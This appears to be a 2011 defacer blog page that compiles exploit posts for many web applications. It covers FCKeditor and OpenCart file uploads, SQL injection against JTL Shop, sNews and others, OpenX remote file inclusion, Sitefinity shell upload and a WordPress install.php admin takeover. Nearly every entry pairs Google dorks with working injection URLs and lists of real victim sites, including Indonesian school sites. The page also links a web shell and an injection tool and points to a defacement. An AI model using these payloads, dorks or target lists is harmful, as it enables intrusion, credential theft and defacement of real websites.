Wednesday, April 13, 2011

CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

 

#[~] Author : Mhiman HNc 
#[~] Home   : mhimantrizone.blogspot.com
#[~] E-mail : mhiman@hacker-newbie.org And mhiman@indonesiandefacer.org
#[~] Found  : 06 April 2011.
#[~] Version: CMS Balitbang 3.42. 
#[~] Tested : Windows 7 Ultimate 32bit. 
#[~] Link   : http://www.kajianwebsite.org/download/CMS%203.42-17082010.rar 
#[!] Dork   : inurl:"/html/siswa.php?" 
inurl:"/html/alumni.php?"
              inurl:"/html/guru.php?"
______________________________________________________________
 
 
#[~] Exploited:http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html
 
#[~] Directory:http://public_html/userfiles/file/file-deface.txt
 
Setting:
"editor/filemanager/connectors/php/config.php"
 
$Config['AllowedExtensions']['File']    = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File']        = array() ;
$Config['FileTypesPath']['File']        = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']        = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
 
- P.o.C:
1. Target:
Special Site:.sch.id (indonesian).
http://www.smpn2muarapinang.sch.id
http://www.sman1gombong.sch.id
http://www.smpn13bdg.sch.id
http://www.pesantrenkrapyak.sch.id
http://www.smkkr2tomohon.sch.id
 
 
2. http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
   http://www.sman1gombong.sch.id/editor/filemanager/connectors/uploadtest.html
 
3. Find Your Files:
   http://www.sman1gombong.sch.id/userfiles/file/h4ck3d.txt
   http://www.sman1gombong.sch.id/userfiles/h4ck3d.txt
 
 
- Greetz:
All Member Hacker-Newbie.
All Member IndonesianDefacer.

 

READ MORE -
dork : allinurl:page_info.php?id_brt=
=============exploit===============
+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--
=============Vuln In here===========
http://Target.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktgbr=16
READ MORE -

Monday, April 4, 2011


JTL Shop 2 Remote SQL Injection Exploit

# Vendor: www.jtl-software.de
# Version: 2

Google dork :
inurl:druckansicht.php?s=  intitle: JTL-Shop2


POC :
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--

Target Found :

http://test.jtl-shop.de/schlebert/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://lifestyle.newco4you.de/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://www.tng-equipment.de/JTL-Shop2/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
 

READ MORE -

IDEA Web Agency (index.php) Blind SQL Injection Vulnerabilit

Platform: PHP
CMS Version: All
CMS Download: http://www.ideawebagency.it/

Dork :
inurl:/index.php?i=news&id_news=

Demo: http://www.schivardi.it/index.php?i=news&id_news=[Blind SQL] 

READ MORE -

WEBANDHOST CMS SQL Injection Vulnerability

# Software Link: http://www.webandhost.de/
# Version: N/A
# Google dork : 
inurl:"default.php?id=" & intext:"powered by WEBANDHOST"

# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi]

POC:
http://site.com/default.php?id=1[SQLi]

admin panel : http://site.com/admin/

READ MORE -

SnoGrafx (cat.php) SQL Injection Vulnerability

Dork :  "powered by SnoGrafx"

Download Page : http://snografx.com/

Sql Injection POC:
http://localhost/[path]/cat.php?cat=2' (Sql)


Referensi : Inj3ct0r

READ MORE -

PhotoPost PHP SQL Injection Vulnerability

# Date: 23/07/2010
# Software Link: www.photopost.com
# Version: 4.0 - 4.6
# Tested on: windows xp pack 3
# CVE : N/A

--------------------------exploit------------------------------

dork : Powered by: PhotoPost PHP 4.6

exploit:  www.site.com/photopost/index.php?cat=1 [sql injection]

READ MORE -

sNews (index.php) SQL Injection Vulnerability

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
Dork:
"Powered by sNews"

===================================================

[+] Vulnerable File :

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :

-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

====================================================

Referensi : Inj3ct0r.com

READ MORE -

LILDBI Shell Upload Vulnerability

# Date: 23.07.2010
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web?=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3


Dork :  allinurl:"/lildbi/

POC :
The shell upload page :  http://target.com/[path]/lildbi/e/admin/uploader.php

File Desination : http://target.com/[path]/lildbi/e/admin/files/[name].php

READ MORE -

Arquicomp CMS (fns_db.php) SQL Injection Vulnerability

Date : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
Dork : 
allinurl:carro.php?id_menu=


[Sofware afected info]
http://www.arquicomp.cl/
http://www.databyte.cl/

[Exploting..demo]

http://example/carro.php?id_menu=10&id_submenu=[SQL]&padre=30&tipo=1&e=7&c=30

READ MORE -

[SQL injection vuln] Elite Gaming Ladders v3.5

Example :http://www.target.com/[path]/standings.php?ladder[id]=SQLi
Dork : inurl:"/standings.php?ladder"
Victim / POC ::: http://www.esportsligen.de/standings.php?ladder[id]='3
READ MORE -
ZenPHOTO (Cross Site Scripting in URI) Vulnerability


Vendor: http://www.zenphoto.org/
Date: 2010-05-27
Bug : XSS
Tested on : windows SP2 Franзais V.(Pnx2 2.0)
Dork :  Powered by zenPHOTO   
POC: http://www.site.com/zenphoto/zp-core/admin.php?
READ MORE -

Site! Prof Edition 2.1 CMS SQL Injection Vulnerability

# Product : CMS Site! Professional Edition 2.1
# Vulnerability : SQL Injection
# Dork :  inurl:/index.php?node= &lng=


[0x01] SQL Injections :
# POC :  http://www.site.com/index.php?node=xxx&lng=x[SQLi]
# Demo : http://www.collinadoro.com/index.php?node=51&lng=1[SQLi]
Target Found:
http://www.malta2010.net/index.php?node=335&lng=1%27
http://www.cardiocentro.org/index.php?node=301&lng=2%27
http://www.peuxreels.com/index.php?node=300&lng=3%27
http://www.buzziebuzzi.ch/index.php?node=288&lng=1%27
http://www.hessemontagnola.ch/index.php?node=2&lng=4%27
http://www.memorial-gander.ch/index.php?node=266&lng=2%27
http://www.bellinzona.ch/index.php?node=7&lng=1%27
http://www.paragonsport.ch/index.php?node=292&lng=1%27
http://www.winteracademy.net/index.php?node=305&lng=1%27
http://www.dupontdesign.ch/index.php?node=325&lng=1%27
http://www.calendar-game.com/index.php?node=297&lng=1%27
http://www.cadro.ch/index.php?node=293&lng=1%27
http://www.volontariato-sociale.ch/index.php?node=291&lng=1%27
http://www.guidottiarchitetti.com/index.php?node=292&lng=1%27
http://www.cstenero.ch/index.php?node=240&lng=6%27
http://www.collinadoro.com/index.php?node=7&lng=1%27
READ MORE -

OpenX (phpAdsNew) Remote File inclusion Vulnerability

=====================================================
OpenX (phpAdsNew) Remote File inclusion Vulnerability
=====================================================
# Exploit Title: OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: Mhiman HNc
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-

include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----


http://

{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

READ MORE -
Joomla com_adsmanager SQli Vulnerability

Google dork : inurl:com_adsmanager


Xploit :
DEMO URL : http://psdemo.joomprod.com/index.php?option=com_adsmanager&page=show_ad&adid=[SQli]&catid=15&Itemid=0
READ MORE -

Friday, April 1, 2011

M4x SQL injection tool

 http://jundab.files.wordpress.com/2010/10/untitled.jpg 

 Download : http://www.ziddu.com/download/10838196/m4xmssql.exe.html

READ MORE -

Php shell devilzc0de

[+]author : devilzc0de
[+]shell : devilzshell php
[+]decode : indolamer.blogspot.com
[+]version: version 1.31
[+]date : 3, july, 2010
[+]genre : web shell php

Download : http://www.ziddu.com/download/10853803/jundabshell.txt.html

Thank's To Jundab

READ MORE -

WordPress instal.php vulnerability

[+] : Thank's To : Jundab
[+] : Software Link : www.wordpress.org/latest.zip
[+] : Version : Semua Versi untuk WordPress
[+] : Tasted On : Windows Xp, Puppy Knop fs 5
[+] : Google Dork : inurl:wordpress/wp-admin/install.php?step=1
[+] : Code : 127.0.0.1/path/wp-admin/install.php

[-] Cari target : inurl:wordpress/wp-admin/install.php?step=1
——————————————————————–
misal target udah dapet
http://www.itsmynews.com/blog/wp-admin/install.php?step=1
akan muncul kotak login yaitu webblog title dan your email
Webblog title : isi dengan judul blog wordpress tersebut misal
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlH9daSGVAxVMbM8Ms2NaJj7ZPlbWK7J_qYy7wJYfAxEFzh2b-IqZNUnDQCoQcPZhPpevufpgkvg_QEhskyRa51UTS8tUB-V4HUCWclc0hJDteBl0FrWynUE0gHCZEJh0nN_mZFAA_KYJ/s320/untitled.jpg




your email : isi dengan sembarang email yang masih aktif
lalu klik “continue to second step >>”
lalu akan muncul :
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_user_level', '10')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_user_level’, ’10′);
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')' at line 1]
INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’);
Finished!
Now you can log in with the username “admin” and password “5432ce”.
Note that password carefully! It is a random password that was generated just for you. If you lose it, you will have to delete the tables from the database yourself, and re-install WordPress. So to review:
Username
admin
Password
5432ce
Login address
wp-login.php
Were you expecting more steps? Sorry to disappoint. All done! :)
http://jundab.files.wordpress.com/2010/10/untitled2.jpg?w=300




kemudian lihat bagian paling bawah sendiri maka akan tercantum username dan password nya.
Username
admin
Password
5432ce
Login address
wp-login.php
*jika wordpress belum terinsal maka insal dahulu
127.0.0.1/wp-admin/install.php?step=1
READ MORE -

Opencart remote file Upload Vulnerability

#Exploit Title: Opencart remote file uploade
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
##################MagelangCyber################
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the “File Upload” To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
#######################Demo Example####################
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

 

READ MORE -

Sitefinity CMS (ASP.NET) Upload Vulnerability

# Exploit Title: Sitefinity CMS (ASP.NET) Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : “Sitefinity: Login”

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]


Deface By Mhiman : http://steemer-online.com/mhiman.htm


Thank's For Jundab

READ MORE -
Template by : mhiman@ hacker-newbie.org